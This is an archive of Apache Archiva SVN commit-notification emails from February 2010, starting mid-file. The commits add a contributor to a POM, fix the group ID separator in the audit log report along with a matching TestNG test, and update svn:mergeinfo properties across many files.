<relativePath>../parent/pom.xml</relativePath> </parent> <name>Archiva</name> From [email protected] Fri Feb 12 15:22:37 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70441 invoked from network); 12 Feb 2010 15:22:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 15:22:37 -0000 Received: (qmail 13282 invoked by uid 500); 12 Feb 2010 15:22:37 -0000 Delivered-To: [email protected] Received: (qmail 13238 invoked by uid 500); 12 Feb 2010 15:22:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13229 invoked by uid 99); 12 Feb 2010 15:22:37 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:22:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:22:35 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9828C2388A77; Fri, 12 Feb 2010 15:22:14 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909457 - /archiva/parent/pom.xml Date: Fri, 12 Feb 2010 15:22:14 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 15:22:13 2010 New Revision: 909457 URL: http://svn.apache.org/viewvc?rev=909457&view=rev Log: add contributor Modified: archiva/parent/pom.xml Modified: archiva/parent/pom.xml URL: http://svn.apache.org/viewvc/archiva/parent/pom.xml?rev=909457&r1=909456&r2=909457&view=diff ============================================================================== --- archiva/parent/pom.xml (original) +++ archiva/parent/pom.xml Fri Feb 12 15:22:13 2010 @@ -505,6 +505,9 @@ <contributor> <name>Andreas Baumann</name> </contributor> + <contributor> + <name>Adelita L. Padilla</name> + </contributor> </contributors> </project> From [email protected] Fri Feb 12 15:30:13 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72680 invoked from network); 12 Feb 2010 15:30:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 15:30:13 -0000 Received: (qmail 24793 invoked by uid 500); 12 Feb 2010 15:30:13 -0000 Delivered-To: [email protected] Received: (qmail 24733 invoked by uid 500); 12 Feb 2010 15:30:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24724 invoked by uid 99); 12 Feb 2010 15:30:13 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:30:13 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:30:10 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 88AA623888E8; Fri, 12 Feb 2010 15:29:48 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909461 - in /archiva/branches/archiva-1.3.x: ./ archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/ archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/ archi... Date: Fri, 12 Feb 2010 15:29:48 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 15:29:47 2010 New Revision: 909461 URL: http://svn.apache.org/viewvc?rev=909461&view=rev Log: [MRM-1304] Query using Group ID field in audit log report uses '/' as a separator instead of '.' Submitted by: Adelita L. Padilla (applied with modifications to test) Merged /archiva/trunk:r909454-909456 Modified: archiva/branches/archiva-1.3.x/ (props changed) archiva/branches/archiva-1.3.x/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java (props changed) archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties (props changed) archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml (props changed) archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java (props changed) archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/ (props changed) archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java (props changed) archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/ (props changed) archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.xml (props changed) archiva/branches/archiva-1.3.x/pom.xml Propchange: archiva/branches/archiva-1.3.x/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:29:47 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements:723609-726925 /archiva/branches/archiva-struts2:699795-705848 /archiva/tags/archiva-1.3:898632 -/archiva/trunk:900342 +/archiva/trunk:900342,909454-909456 Propchange: archiva/branches/archiva-1.3.x/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:29:47 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/BaseConsumer.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:898632 -/archiva/trunk/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:900342 +/archiva/trunk/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:900342,909454-909456 Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties?rev=909461&r1=909460&r2=909461&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties Fri Feb 12 15:29:47 2010 @@ -106,3 +106,8 @@ # Browse - MRM-1278 test SNAPSHOTS_REPOSITORY=snapshots RELEASES_REPOSITORY=releases + +# Audit Log Report - MRM-1304 +AUDITLOG_GROUPID=group.id +AUDITLOG_EXPECTED_ARTIFACT=group/id/test/1.0/test-1.0.jar + Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=909461&r1=909460&r2=909461&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Fri Feb 12 15:29:47 2010 @@ -164,4 +164,27 @@ clickLinkWithText( "Logout" ); login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); } + + @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") + public void testViewAuditLogsReportForGroupId() + { + String groupId = getProperty("AUDITLOG_GROUPID"); + String artifactId = getProperty("ARTIFACTID"); + String version = getProperty("VERSION"); + String packaging = getProperty("PACKAGING"); + String repositoryId = getProperty("REPOSITORYID"); + String expectedArtifact = getProperty("AUDITLOG_EXPECTED_ARTIFACT"); + + addArtifact( groupId, artifactId, version, packaging, getProperty( "SNAPSHOT_ARTIFACTFILEPATH" ), repositoryId ); + + goToAuditLogReports(); + + selectValue( "repository", repositoryId ); + setFieldValue( "groupId", groupId ); + submit(); + + assertAuditLogsReportPage(); + assertTextPresent( expectedArtifact ); + assertTextPresent( repositoryId ); + } } Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java?rev=909461&r1=909460&r2=909461&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Fri Feb 12 15:29:47 2010 @@ -160,7 +160,8 @@ if ( groupId != null && !"".equals( groupId.trim() ) ) { - artifact = groupId + ( ( artifactId != null && !"".equals( artifactId.trim() ) ) ? ( "/" + artifactId + "/%" ) : "%" ); + String modifiedGroupId = groupId.replace( ".", "/" ); + artifact = modifiedGroupId + ( ( artifactId != null && !"".equals( artifactId.trim() ) ) ? ( "/" + artifactId + "/%" ) : "%" ); } else { Propchange: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:29:47 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:900342 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.properties:900342,909454-909456 Propchange: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:29:47 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:900342 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/resources/struts.xml:900342,909454-909456 Propchange: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:29:47 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/rss/UserRepositoriesStub.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/rss/UserRepositoriesStub.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java:900342 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/security/UserRepositoriesStub.java:900342,909454-909456 Propchange: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:29:47 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:898632* -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:900342 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports:900342,909454-909456 Propchange: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:29:47 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:900342 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.java:900342,909454-909456 Propchange: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:29:47 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:898632* -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:900342 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports:900342,909454-909456 Propchange: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:29:47 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.xml:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.xml:898632 -/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.xml:900342 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/test/resources/org/apache/maven/archiva/web/action/reports/GenerateReportActionTest.xml:900342,909454-909456 Modified: archiva/branches/archiva-1.3.x/pom.xml URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/pom.xml?rev=909461&r1=909460&r2=909461&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/pom.xml (original) +++ archiva/branches/archiva-1.3.x/pom.xml Fri Feb 12 15:29:47 2010 @@ -28,7 +28,7 @@ <parent> <groupId>org.apache.archiva</groupId> <artifactId>archiva-parent</artifactId> - <version>5</version> + <version>6-SNAPSHOT</version> <relativePath>../parent/pom.xml</relativePath> </parent> <name>Archiva</name> From [email protected] Fri Feb 12 15:54:19 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90405 invoked from network); 12 Feb 2010 15:54:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 15:54:19 -0000 Received: (qmail 75792 invoked by uid 500); 12 Feb 2010 15:54:19 -0000 Delivered-To: [email protected] Received: (qmail 75730 invoked by uid 500); 12 Feb 2010 15:54:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75721 invoked by uid 99); 12 Feb 2010 15:54:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:54:19 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:54:17 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id C74C52388A35; Fri, 12 Feb 2010 15:53:56 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909470 [3/3] - in /archiva/branches/MRM-1025: ./ archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/ archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/arch... Date: Fri, 12 Feb 2010 15:53:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:825850-885005,885006-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2:825850-885005,885006-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/dependency/tree/maven2/DependencyTreeBuilderTest.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -1 +1 @@ -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:889228-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:889228-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:825850-882383,885006-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/TestMetadataResolver.java:825850-882383,885006-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-909070* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:825850-909070 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/java/org/apache/archiva/metadata/repository/storage/maven2/MavenRepositoryMetadataReaderTest.java:699795-705848 